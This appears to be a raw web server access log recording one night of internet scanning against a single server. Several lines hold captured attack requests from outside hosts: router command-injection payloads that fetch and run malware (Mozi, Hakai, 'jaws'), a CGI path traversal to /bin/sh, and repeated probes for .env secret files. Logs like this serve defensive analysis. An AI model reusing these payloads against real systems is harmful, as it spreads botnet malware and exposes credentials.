185.225.74.55 - - [03/Mar/2023:04:04:19 +0100] "POST /cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh HTTP/1.1" 400 333 "-" "-"
183.136.225.32 - - [03/Mar/2023:04:04:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
185.225.74.55 - - [03/Mar/2023:04:07:23 +0100] "POST /cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh HTTP/1.1" 400 333 "-" "-"
183.136.225.32 - - [03/Mar/2023:04:09:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [03/Mar/2023:04:09:34 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [03/Mar/2023:04:09:37 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
163.182.241.93 - - [03/Mar/2023:04:10:45 +0100] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 329 "-" "-"
193.32.162.159 - - [03/Mar/2023:04:12:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
151.238.65.161 - - [03/Mar/2023:04:18:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
151.238.65.161 - - [03/Mar/2023:04:18:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
103.93.179.54 - - [03/Mar/2023:04:21:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
92.118.39.82 - - [03/Mar/2023:04:26:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
92.118.39.82 - - [03/Mar/2023:04:26:26 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
4.14.70.9 - - [03/Mar/2023:04:26:47 +0100] "GET /audio/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.14.70.9 - - [03/Mar/2023:04:26:47 +0100] "POST /audio HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.14.70.9 - - [03/Mar/2023:04:26:54 +0100] "GET /audio/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.14.70.9 - - [03/Mar/2023:04:26:54 +0100] "POST /audio HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
92.118.39.82 - - [03/Mar/2023:04:27:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
92.118.39.82 - - [03/Mar/2023:04:27:12 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
193.32.162.159 - - [03/Mar/2023:04:28:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
4.14.70.9 - - [03/Mar/2023:04:28:51 +0100] "GET /audio/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.14.70.9 - - [03/Mar/2023:04:28:51 +0100] "POST /audio HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
64.62.197.238 - - [03/Mar/2023:04:30:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0"
64.62.197.231 - - [03/Mar/2023:04:31:21 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0"
165.232.121.161 - - [03/Mar/2023:04:31:42 +0100] "\x16\x03\x01" 501 318 "-" "-"
165.232.121.161 - - [03/Mar/2023:04:31:42 +0100] "\x16\x03\x01" 501 318 "-" "-"
165.232.121.161 - - [03/Mar/2023:04:31:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.232.121.161 - - [03/Mar/2023:04:31:42 +0100] "GET /client/get_targets HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
138.199.34.193 - - [03/Mar/2023:04:32:19 +0100] "CONNECT upload.wikimedia.org:443 HTTP/1.1" 405 350 "-" "Java/1.8.0_352"
64.62.197.234 - - [03/Mar/2023:04:32:43 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0"
59.92.172.148 - - [03/Mar/2023:04:36:10 +0100] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://59.92.172.148:33957/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 310 "-" "-"
80.66.66.112 - - [03/Mar/2023:04:37:27 +0100] "\x03" 501 316 "-" "-"
92.118.39.82 - - [03/Mar/2023:04:38:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
92.118.39.82 - - [03/Mar/2023:04:38:40 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
92.118.39.82 - - [03/Mar/2023:04:40:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
92.118.39.82 - - [03/Mar/2023:04:40:57 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
193.32.162.159 - - [03/Mar/2023:04:48:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
103.41.26.32 - - [03/Mar/2023:04:48:43 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
193.106.29.122 - - [03/Mar/2023:04:51:07 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
179.43.177.242 - - [03/Mar/2023:04:53:39 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
27.74.240.14 - - [03/Mar/2023:04:56:42 +0100] "GET /redmine/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
27.74.240.14 - - [03/Mar/2023:04:56:42 +0100] "POST /redmine HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [03/Mar/2023:04:58:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.106.29.122 - - [03/Mar/2023:04:58:46 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
89.148.11.222 - - [03/Mar/2023:04:59:11 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://1.116.115.169/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
68.66.164.26 - - [03/Mar/2023:04:59:15 +0100] "GET /local/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
68.66.164.26 - - [03/Mar/2023:04:59:16 +0100] "POST /local HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
170.253.13.248 - - [03/Mar/2023:04:59:28 +0100] "GET /storage/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
170.253.13.248 - - [03/Mar/2023:04:59:28 +0100] "POST /storage HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
159.89.237.66 - - [03/Mar/2023:05:01:55 +0100] "\x16\x03\x01" 501 318 "-" "-"
159.89.237.66 - - [03/Mar/2023:05:01:56 +0100] "\x16\x03\x01" 501 318 "-" "-"
159.89.237.66 - - [03/Mar/2023:05:01:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.89.237.66 - - [03/Mar/2023:05:01:56 +0100] "GET /client/get_targets HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
179.43.177.242 - - [03/Mar/2023:05:02:23 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
179.43.177.242 - - [03/Mar/2023:05:05:48 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
193.106.29.122 - - [03/Mar/2023:05:08:42 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
205.210.31.150 - - [03/Mar/2023:05:08:52 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
193.106.29.122 - - [03/Mar/2023:05:10:54 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
179.43.177.242 - - [03/Mar/2023:05:12:30 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
193.106.29.122 - - [03/Mar/2023:05:12:40 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
68.66.164.26 - - [03/Mar/2023:05:13:03 +0100] "GET /lib/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
68.66.164.26 - - [03/Mar/2023:05:13:04 +0100] "POST /lib HTTP/1.1" 404 308 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.17.224.131 - - [03/Mar/2023:05:13:10 +0100] "GET /public/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.17.224.131 - - [03/Mar/2023:05:13:10 +0100] "POST /public HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.17.224.131 - - [03/Mar/2023:05:14:31 +0100] "GET /public/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.17.224.131 - - [03/Mar/2023:05:14:31 +0100] "POST /public HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.17.224.131 - - [03/Mar/2023:05:15:25 +0100] "GET /public/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.17.224.131 - - [03/Mar/2023:05:15:25 +0100] "POST /public HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.132.53.119 - - [03/Mar/2023:05:16:41 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
51.158.37.156 - - [03/Mar/2023:05:18:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
51.158.37.156 - - [03/Mar/2023:05:18:23 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
193.106.29.122 - - [03/Mar/2023:05:19:15 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
183.136.225.43 - - [03/Mar/2023:05:21:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
179.43.177.242 - - [03/Mar/2023:05:22:09 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
179.43.177.242 - - [03/Mar/2023:05:23:02 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.87:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
179.43.177.242 - - [03/Mar/2023:05:27:31 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
179.43.177.242 - - [03/Mar/2023:05:28:01 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
193.32.162.159 - - [03/Mar/2023:05:31:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.106.29.122 - - [03/Mar/2023:05:31:57 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
93.160.62.190 - - [03/Mar/2023:05:32:09 +0100] "GET /library/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
93.160.62.190 - - [03/Mar/2023:05:32:09 +0100] "POST /library HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.228.190.236 - - [03/Mar/2023:05:35:28 +0100] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.28.2"
183.136.225.32 - - [03/Mar/2023:05:36:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
64.227.164.101 - - [03/Mar/2023:05:37:16 +0100] "\x16\x03\x01" 501 318 "-" "-"
64.227.164.101 - - [03/Mar/2023:05:37:16 +0100] "\x16\x03\x01" 501 318 "-" "-"
64.227.164.101 - - [03/Mar/2023:05:37:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
64.227.164.101 - - [03/Mar/2023:05:37:17 +0100] "GET /client/get_targets HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
193.106.29.122 - - [03/Mar/2023:05:41:25 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
183.136.225.32 - - [03/Mar/2023:05:41:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
183.136.225.32 - - [03/Mar/2023:05:41:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [03/Mar/2023:05:41:45 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [03/Mar/2023:05:41:49 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
185.32.164.145 - - [03/Mar/2023:05:43:11 +0100] "GET /__tests__/test-become/.env HTTP/1.1" 404 331 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.32.164.145 - - [03/Mar/2023:05:43:11 +0100] "POST /__tests__/test-become HTTP/1.1" 404 326 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
68.66.164.26 - - [03/Mar/2023:05:43:51 +0100] "GET /backend/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
68.66.164.26 - - [03/Mar/2023:05:43:51 +0100] "POST /backend HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
179.43.177.242 - - [03/Mar/2023:05:44:09 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.84:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.32.164.145 - - [03/Mar/2023:05:45:11 +0100] "GET /__tests__/test-become/.env HTTP/1.1" 404 331 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.32.164.145 - - [03/Mar/2023:05:45:11 +0100] "POST /__tests__/test-become HTTP/1.1" 404 326 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.17.224.132 - - [03/Mar/2023:05:45:17 +0100] "GET /www/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.17.224.132 - - [03/Mar/2023:05:45:17 +0100] "POST /www HTTP/1.1" 404 308 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.17.224.132 - - [03/Mar/2023:05:45:23 +0100] "GET /www/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.17.224.132 - - [03/Mar/2023:05:45:23 +0100] "POST /www HTTP/1.1" 404 308 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.32.164.145 - - [03/Mar/2023:05:46:36 +0100] "GET /__tests__/test-become/.env HTTP/1.1" 404 331 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.32.164.145 - - [03/Mar/2023:05:46:36 +0100] "POST /__tests__/test-become HTTP/1.1" 404 326 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
183.136.225.32 - - [03/Mar/2023:05:46:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [03/Mar/2023:05:46:38 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [03/Mar/2023:05:46:40 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
4.17.224.132 - - [03/Mar/2023:05:47:21 +0100] "GET /www/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.17.224.132 - - [03/Mar/2023:05:47:21 +0100] "POST /www HTTP/1.1" 404 308 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
27.74.240.14 - - [03/Mar/2023:05:47:50 +0100] "GET /vendor/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
27.74.240.14 - - [03/Mar/2023:05:47:51 +0100] "POST /vendor HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
41.251.249.88 - - [03/Mar/2023:05:49:00 +0100] "GET /web/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
41.251.249.88 - - [03/Mar/2023:05:49:00 +0100] "POST /web HTTP/1.1" 404 308 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
188.233.97.233 - - [03/Mar/2023:05:49:38 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://1.116.115.169/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
193.32.162.159 - - [03/Mar/2023:05:50:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.32.162.159 - - [03/Mar/2023:05:50:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
172.105.4.247 - - [03/Mar/2023:05:51:02 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 107.6.255.132/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
193.106.29.122 - - [03/Mar/2023:05:51:04 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
193.32.162.159 - - [03/Mar/2023:05:51:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
20.228.190.236 - - [03/Mar/2023:05:52:16 +0100] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.28.2"
20.228.190.236 - - [03/Mar/2023:05:54:32 +0100] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.28.2"
193.32.162.159 - - [03/Mar/2023:05:54:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
181.114.134.36 - - [03/Mar/2023:06:01:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
193.32.162.159 - - [03/Mar/2023:06:03:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.32.162.159 - - [03/Mar/2023:06:04:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
20.228.190.236 - - [03/Mar/2023:06:05:39 +0100] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.28.2"
212.71.251.77 - - [03/Mar/2023:06:06:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
20.228.190.236 - - [03/Mar/2023:06:06:43 +0100] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.28.2"
103.61.8.42 - - [03/Mar/2023:06:09:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
139.144.154.191 - - [03/Mar/2023:06:13:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
183.136.225.32 - - [03/Mar/2023:06:17:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
193.32.162.159 - - [03/Mar/2023:06:18:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
20.228.190.236 - - [03/Mar/2023:06:19:12 +0100] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.28.2"
